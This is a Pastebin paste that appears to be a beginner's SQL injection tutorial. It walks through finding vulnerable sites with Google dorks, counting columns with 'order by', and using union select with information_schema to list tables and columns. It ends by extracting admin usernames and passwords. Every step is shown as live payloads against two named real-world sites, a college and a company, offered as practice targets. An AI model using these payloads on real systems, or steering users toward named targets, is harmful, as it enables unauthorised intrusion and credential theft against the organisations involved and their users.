Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Sql- structured query language
- Vuln- vulnerable
- to start sql we should find 1st vuln site. In other word to inject a site you need to find a vuln site.
- To find vuln site we need to use 'Dork'
- which mean searching vuln site from googLe Using dork
- some of the dorks are here-
- Index.php?id=
- Event.php?id=
- News.php?id=
- This are the some example of dorks there are thousand of dorks to find vuln sites among them this are the some.. Now google this dork and open one site and put this sign after id=something it means
- Id=1'
- Id=20' don't change value after id=20 this is just an example to see either sites is vuln or not to inject.. So after putting this ' sign you will get sql error if you get sql error then it is vuln and those site which you find vuln
- about sql part 2
- Time to learn next step of sql injection
- #recall- in previous tutorial we learn to find vuln site yeah? Now we are upgrading the step now finding column of site is our next steP
- Vuln site- http://www.skitm.edu.in/faculty.php?id=2' this one is for n00b only kiss emoticon this site have very low security grin emoticon i practise in this site when i was learning sql injection tongue emoticon so here we go in our step grin emoticon
- To find column of the vuln site we have to use this query there are many query to find vuln column but because of the basic tut i am using here only: order by method smile emoticon
- Here is the query: order by
- Step- http://www.skitm.edu.in/faculty.php?id=2 order by 10
- Error: Unknown column '10' in 'order clause'
- Try until when this unknow column doesn't disappear from the screen grin emoticon
- Still getting that error yeah so try by putting 9 like this
- http://www.skitm.edu.in/faculty.php?id=2 order by 9
- Error: Unknown column '9' in 'order clause' still getting error yeah so try and try wink emoticon
- http://www.skitm.edu.in/faculty.php?id=2 order by 8
- Error: Unknown column '8' in 'order clause' again error tongue emoticon try until it disappear from your screen so keep on decreasing the number grin emoticon
- http://www.skitm.edu.in/faculty.php?id=2 order by 7
- Error: Unknown column '7' error
- http://www.skitm.edu.in/faculty.php?id=2 order by 6
- Error: Unknown column 6'
- http://www.skitm.edu.in/faculty.php?id=2 order by 5
- Error: Unknown column 5'
- http://www.skitm.edu.in/faculty.php?id=2 order by 4
- Error: Unknown column 4'
- http://www.skitm.edu.in/faculty.php?id=2 order by 3
- Error: Unknown column 3'
- http://www.skitm.edu.in/faculty.php?id=2 order by 2
- Error: Unknown column 2'
- http://www.skitm.edu.in/faculty.php?id=2 order by 2
- No Error in column 2'
- It mean this site have 2 column smile emoticon so finally we found column of that site.
- It is not mean that in all site there will be 2column in different site different column so don't keep on your mind that only 2 column in all vuln site now here we find column of site. And remember if last error is in 10 of any site then remember there is 9 column same as in next site if got last error in 26 then there is 25 column
- site- we will practise in this site
- http://www.skitm.edu.in/faculty.php?id=2
- All step wise 1st we learn how to find either it is vuln or not yeah?
- Here we use method like this http://www.skitm.edu.in/faculty.php?id=2'
- getting sql error yeah? It mean this site is vuln.
- #2nd post
- in second step what we learn? we learn how to find vuln column? Like this http://www.skitm.edu.in/faculty.php?id=2 order by 3
- #3rd step is that to find vuln column tongue emoticon both are column but to find vuln column result in screen we need order by to get result in screen like shown in screenShOt,
- Here we go in step now smile emoticon
- 1) do you remember or not while we inject this site we got last error in 3 yeah? It mean here is 2 column now to display how many vuln column are there in screen we have to use following query smile emoticon
- http://www.skitm.edu.in/faculty.php?id=-2 union select 1,2--
- What i have change in this site?
- => after id=parameter i haven't change there anything but i have put there sign '-' while using union select always remember to put that sign before parametEr.. smile emoticon
- how we will know that we have to put union select 1,2?
- => we have to use 1st order by method after knowing column vuln we have tO use according to vuln column value in union select..
- example-
- site- http://www.calidus.ro/
- vuln site http://www.calidus.ro/en/news.php?id=2
- To check the vuln column value in screen you will get some number in screen like 1,2,3 only one digit smile emoticon
- Another example
- http://www.calidus.ro/en/news.php…
- i got last error in 5 so i know now there is vuln in 4 so i use union select 1.2,3,4 and in screen i get vuln is column 2 smile emoticon
- #remember that when you use order by method and get vuln column according to it's value put it in union select grin emoticon
- Today i am gonna teach you how to find
- => version
- => user
- => database
- All step those which we have learn wink emoticon
- 1st find site either it is vuln or not
- 1st step http://www.skitm.edu.in' => sql erro site is vuln
- 2nd step http://www.skitm.edu.in/faculty.php?id=-2 order by 2 using order by to find vuln colum value
- 3rd step http://www.skitm.edu.in/faculty.php?id=-2 union select 1,2--
- ------all this step have been learn------
- today new step
- step to find version of the following site?
- http://www.skitm.edu.in/faculty.php…
- Q) how i do it? confused_rev emoticon
- => nothing new i have just put there version instead of putting there value 2
- why i put it in 2 only?
- => because while using union select 1,2 it display 2 as vuln column so i put it in value 2 to find version
- example if in some site if you find there vuln column in 9 then you need to do like this to find version
- union select 1,2,3,4,5,6,7,8,version(),10,11,12--
- example of site http://www.calidus.ro/en/news.php…--
- 2nd step to find user
- All method are same just change version() and instead of it put there user()
- like this
- http://www.skitm.edu.in/faculty.php…--
- All step are same so hope i don't have to tell about this and at last to find database
- we need to do same step change user into database then you will get result like this
- http://www.skitm.edu.in/faculty.php…--
- now i am going to teach that how to find the table me the this so this is the query +union+select+1,group_concat(table_name)%20from%20information_schema.tables
- after getting site is vuln or not try to use this query some site example are-
- Http://www.skitm.edu.in/faculty.php…
- use like this and get all site table smile emoticon
- We should now be able to see all
- the tables listed on one page,
- sometimes the last tableswill be
- cut off the end because a portion
- of the page will be covered in table
- names frominformation_schema which aren't useful for us so
- really, I usually prefer to display
- tablenames from the primary
- database rather than information_
- schema, we can do the following by using the +where+table_
- schema=database()
- command:where => A query for
- selectiontable_schema => Schema
- of tables from a databasedatabase
- () => In context the primary database, just leave it as it is.
- example - http://www.skitm.edu.in/faculty.php?id=-2+union+select
- +1,group_concat(table_name)+from
- +information_schema.tables+where
- +table_schema=database()
- 1>how to find admin detail
- 2> admin column from selection table grin emoticon
- I hope you have understand all method smile emoticon
- to find table i have already teach so now time to learn about finding column
- ====>QUERY<=====
- +from
- +information_schema.columns
- where table_name=TableNameHEX
- example >
- -23+union+select
- +1,group_concat(column_name),3 from information_schema.columns
- where table_name=Admin
- ====>ERRoR<=====
- why we get error here you know? Because we haven't convert yet in hex to 'ADMIN'
- >>>so try this one query smile emoticon
- The HEX of Admin is:
- 41646d696eNow we must add 0x
- (MySQL integer) at the front of
- the HEX, which should now look
- like this: 0x41646d696eAnd pop it
- onto the end of the URL replacing Admin, so the URL should look
- something like the following.
- Example:wxw.site.com/index.php? Client_id=-23+union+select
- +1,group_concat(column_name),3 from information_schema.columns
- where table_name=0x41646d696e
- Real site example: i conver USER in hex and get this grin emoticon
- http://www.skitm.edu.in/faculty.php…
- So after finding table you have to choose the table and find it's column smile emoticon
- in every site don't use table in normal text
- whenever you want to find column of the site convert it in hex then only you can get value
- ------------------------------------------------------------------------------------------------------------------------------
- Query to find admin detail smile emoticon
- Example:www.site.com/index.php? Client_id=-23+union+select
- +1,concat
- (username,0x3a,password),3+from
- +Admin
- After doing all step this is one last step of basic sql smile emoticon after this you will get advance tut then this so try to be fully updateD.. smile emoticon
- So our target site is
- http://www.skitm.edu.in
- to find this site admin detail we will use following query smile emoticon
- http://www.skitm.edu.in/faculty.php?id=-2+union+select
- +1,concat
- (username,0x3a,password)+from
- +User
- don't put here username and password always because in every password and username will not work so to put correct one you need to find column of site and put there smile emoticon
- those result you get in column you need to put it here
Advertisement
Add Comment
Please, Sign In to add comment